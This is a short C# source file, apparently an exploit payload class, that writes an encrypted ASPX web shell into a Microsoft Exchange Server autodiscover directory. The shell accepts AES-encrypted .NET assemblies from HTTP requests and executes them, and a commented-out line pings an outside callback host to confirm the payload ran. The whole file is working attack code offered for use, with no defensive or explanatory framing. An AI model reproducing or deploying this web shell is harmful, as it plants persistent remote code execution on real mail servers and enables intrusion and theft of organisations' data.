﻿using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;

namespace exploit
{
    class ExploitClass
    {
        public ExploitClass()
        {
            
            string data = "<%@ Page Language=\"C#\"%><%try{string key = \"1a1dc91c907325c6\";" +
                "byte[] data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encodin" +
                "g.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(Context.Reque" +
                "st.BinaryRead(Context.Request.ContentLength), 0, Context.Request.ContentLength);if (Context.Session[\"" +
                "payload\"] == null){ Context.Session[\"payload\"] = (System.Reflection.Assembly)typeof(System.Reflection." +
                "Assembly).GetMethod(\"Load\", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });}e" +
                "lse{ object o = ((System.Reflection.Assembly)Context.Session[\"payload\"]).CreateInstance(\"LY\"); o.Equals(" +
                "Context); o.Equals(data);byte[] r = System.Convert.FromBase64String(o.ToString());Context.Response.BinaryWrit" +
                "e(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(ke" +
                "y), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length));}}catch(System.Exception){}%>";
            
            try
            {
                // Payload code to be executed
                //System.Diagnostics.Process.Start("ping.exe tt.izi4b6.tweb.email");
                System.IO.File.WriteAllText(@"C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\autodiscover\Services.aspx", data);
            }
            catch (Exception)
            {
            }
        }
    }
}
